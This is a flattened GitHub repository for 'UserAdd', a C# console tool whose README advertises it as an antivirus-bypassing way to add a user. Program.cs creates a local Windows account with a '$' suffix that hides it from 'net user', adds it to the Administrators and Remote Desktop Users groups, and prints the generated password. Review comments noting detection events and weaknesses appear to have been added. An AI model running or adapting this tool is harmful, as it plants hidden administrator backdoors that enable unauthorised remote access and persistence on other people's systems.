├── UserAdd ├── obj │ ├── Release │ │ ├── UserAdd.csproj.FileListAbsolute.txt │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ └── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ └── Debug │ │ ├── UserAdd.csproj.AssemblyReference.cache │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ └── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs ├── App.config ├── Properties │ └── AssemblyInfo.cs ├── Program.cs └── UserAdd.csproj ├── imgs └── image-20211230125147015.png ├── README.md └── UserAdd.sln /UserAdd/obj/Release/UserAdd.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /UserAdd/obj/Debug/UserAdd.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /imgs/image-20211230125147015.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/UserAdd/HEAD/imgs/image-20211230125147015.png -------------------------------------------------------------------------------- /UserAdd/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/UserAdd/HEAD/UserAdd/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /UserAdd/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/An0nySec/UserAdd/HEAD/UserAdd/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /UserAdd/App.config: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /UserAdd/obj/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /UserAdd/obj/Release/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs: -------------------------------------------------------------------------------- 1 | // 2 | using System; 3 | using System.Reflection; 4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")] 5 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Introduce 2 | 3 | [Bypass AV 添加用户](https://payloads.cn/2021/1230/bypass-av-add-user.html) 4 | 5 | **UserAdd.exe** 6 | 7 | ```tex 8 | [!] The default is 10 bits random password 9 | Usage: UserAdd.exe 10 | ``` 11 | 12 | ![image-20211230125147015](imgs/image-20211230125147015.png) 13 | 14 | 1. 利用`DirectoryService` 命名空间添加用户 15 | 2. 将用户添加到管理员与远程桌面组 16 | 3. 
Bypass AV 17 | 18 | ------ 19 | 20 | ### Reference 21 | 22 | - [使用目录服务和 Visual C 升在本地系统中添加用户](https://docs.microsoft.com/zh-cn/troubleshoot/dotnet/csharp/add-user-local-system) -------------------------------------------------------------------------------- /UserAdd/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // 有关程序集的一般信息由以下 6 | // 控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("UserAdd")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("UserAdd")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // 将 ComVisible 设置为 false 会使此程序集中的类型 18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型 19 | //请将此类型的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("4434b59c-9d21-4847-b95c-fd8cfaeea739")] 24 | 25 | // 程序集的版本信息由下列四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 生成号 30 | // 修订号 31 | // 32 | //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值 33 | //通过使用 "*",如下所示: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /UserAdd.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.0.32014.148 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "UserAdd", "UserAdd\UserAdd.csproj", "{4434B59C-9D21-4847-B95C-FD8CFAEEA739}" 7 | EndProject 8 | Global 9 | 
GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {4434B59C-9D21-4847-B95C-FD8CFAEEA739}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {4434B59C-9D21-4847-B95C-FD8CFAEEA739}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {4434B59C-9D21-4847-B95C-FD8CFAEEA739}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {4434B59C-9D21-4847-B95C-FD8CFAEEA739}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {6ADE94B2-BB43-45D9-AAB5-8132BE6A8489} 24 | EndGlobalSection 25 | EndGlobal 26 |
--------------------------------------------------------------------------------
/UserAdd/Program.cs:
--------------------------------------------------------------------------------
using System;
using System.DirectoryServices;

// Reference:https://docs.microsoft.com/zh-cn/troubleshoot/dotnet/csharp/add-user-local-system

namespace UserAdd
{
    /// <summary>
    /// Console program that creates a local Windows account through the WinNT
    /// provider of System.DirectoryServices, gives it a generated password, and
    /// adds it to the "Administrators" and "Remote Desktop Users" groups.
    /// </summary>
    /// <remarks>
    /// Review notes (defensive reading of this file):
    /// - The result is a new account with local administrator and RDP rights.
    ///   When account-management auditing is enabled, Windows typically records
    ///   this as Security event 4720 (account created) followed by 4732 (member
    ///   added to a local group); those events are the place to alert on.
    /// - The account name always ends in '$' (see <c>username</c> below).
    ///   NOTE(review): names ending in '$' look like machine accounts and are
    ///   not listed by <c>net user</c>, so account audits should not rely on
    ///   that command alone.
    /// - NOTE(review): creating local accounts presumably requires the process
    ///   to run with administrative rights; nothing in this file checks for it.
    /// </remarks>
    class Class1
    {
        /// <summary>
        /// Entry point. Expects exactly one argument, which is used as the base
        /// of the account name; prints a usage text for any other argument count.
        /// </summary>
        /// <param name="args">Command-line arguments; args[0] is the account name.</param>
        static void Main(string[] args)
        {
            if (args.Length != 1)
            {
                // "10 bits" in the message means a 10-character password
                // (see the generation loop below).
                Console.WriteLine("[!] The default is 10 bits random password");
                // NOTE(review): the argument placeholder after "UserAdd.exe"
                // appears to be missing from the usage string; the single
                // expected argument is the account name read from args[0].
                Console.WriteLine("Usage: UserAdd.exe ");
            }
            else
            {
                string user = args[0];
                // The supplied name is used unvalidated and always gets a '$' suffix.
                string username = user + "$";
                // 10-character random password
                string chars = "!@#$%0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
                // NOTE(review): System.Random seeded from the clock is not a
                // cryptographic generator; the password is derived entirely from
                // the 32-bit truncation of DateTime.Now.Ticks at start-up.
                Random randrom = new Random((int)DateTime.Now.Ticks);
                string password = "";
                for (int i = 0; i < 10; i++)
                {
                    password += chars[randrom.Next(chars.Length)];
                }
                try
                {
                    // Bind to this machine ("WinNT://<MachineName>,computer").
                    // NOTE(review): DirectoryEntry is IDisposable; none of the
                    // entries created here are disposed before the process exits.
                    DirectoryEntry AD = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer");
                    // Create the user object, set its password, then persist it.
                    DirectoryEntry NewUser = AD.Children.Add(username, "user");
                    NewUser.Invoke("SetPassword", new object[] { password });
                    //NewUser.Invoke("Put", new object[] { "Description", "Test User from .NET" });
                    NewUser.CommitChanges();
                    DirectoryEntry grp;

                    // Group membership is added after the account is committed,
                    // so a failure below leaves the account in place without
                    // the remaining memberships.
                    // NOTE(review): DirectoryEntries.Find is documented to throw
                    // when the child does not exist, so the null checks are
                    // probably never false — confirm.
                    grp = AD.Children.Find("Administrators", "group");
                    if (grp != null) { grp.Invoke("Add", new object[] { NewUser.Path.ToString() }); }
                    grp = AD.Children.Find("Remote Desktop Users", "group");
                    if (grp != null) { grp.Invoke("Add", new object[] { NewUser.Path.ToString() }); }
                    Console.WriteLine("[*] Account Created Successfully");
                    // The clear-text password is written to standard output, so it
                    // ends up in any console capture or transcript of the run.
                    Console.WriteLine($"[+] Username: {username}\n[+] Password: {password}");
                }
                catch (Exception ex)
                {
                    // Every failure is reduced to its message text; Main still
                    // returns normally, so no failing exit code is set.
                    Console.WriteLine(ex.Message);
                }

            }
        }
    }
}
--------------------------------------------------------------------------------
/UserAdd/UserAdd.csproj:
--------------------------------------------------------------------------------
1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {4434B59C-9D21-4847-B95C-FD8CFAEEA739} 8 | Exe 9 | UserAdd 10 | UserAdd 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 |
46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | --------------------------------------------------------------------------------